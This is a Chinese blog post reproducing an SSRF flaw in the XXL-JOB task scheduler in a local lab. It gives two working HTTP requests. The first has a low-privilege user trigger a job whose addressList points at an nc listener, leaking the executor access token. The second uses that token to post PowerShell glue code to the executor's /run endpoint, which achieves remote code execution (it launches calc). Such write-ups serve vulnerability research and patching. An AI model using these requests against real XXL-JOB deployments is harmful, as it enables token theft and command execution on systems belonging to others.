xxl-job ssrf漏洞复现

xxl-job ssrf漏洞复现

漏洞简介

XXL-JOB是基于java语言的分布式任务调度平台,该漏洞来自/trigger,直接向addressList指定的地址发送请求,不判断addressList参数是否为有效的执行器地址。它可以利用SSRF漏洞,攻击者获取XXL-JOB-ACCESS-TOKEN并调用任意执行器

漏洞复现

项目地址:https://github.com/xuxueli/xxl-job

搭建环境,配置JDBC与TOKEN

image-20240126102117589

image-20240126102149282

根据官方文档,需要将调度中心和执行器,设置了相同的AccessToken

image-20240126102310287

所以将执行器token也设为123

image-20240126102405241

启动项目进入登陆界面http://127.0.0.1:8080/xxl-job-admin/,默认密码admin/123456

image-20240126102606521

新建一个低权限测试账户test/123456

image-20240126102633145

登录低权限账户发现无法访问任务管理功能页面

image-20240126102845403

image-20240126102825960

构造poc

POST /xxl-job-admin/jobinfo/trigger HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 69
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a2274657374222c2270617373776f7264223a226531306164633339343962613539616262653536653035376632306638383365222c22726f6c65223a302c227065726d697373696f6e223a22227d
Connection: close

id=1&executorParam=test&addressList=http%3A%2F%2F127.0.0.1%3A9090

开启一个nc监听端口9090,发送poc,查看泄露token

image-20240126103209960

RCE

构造payload

POST /run HTTP/1.1
Host: 127.0.0.1:9999
Content-Length: 69
XXL-JOB-ACCESS-TOKEN: 123
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close



{
        "jobId":1,                                  
        "executorHandler":"demoJobHandler",         
        "executorParams":"demoJobHandler",          
        "executorBlockStrategy":"COVER_EARLY",      
        "executorTimeout":0,                        
        "logId":1,                                  
        "logDateTime":1586629003729,                
        "glueType":"GLUE_POWERSHELL",                          
        "glueSource":"calc",                         
        "glueUpdatetime":1586629003727,             
        "broadcastIndex":0,                         
        "broadcastTotal":0                          
}

发送,即可发现计算机弹出

image-20240126110257270

  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值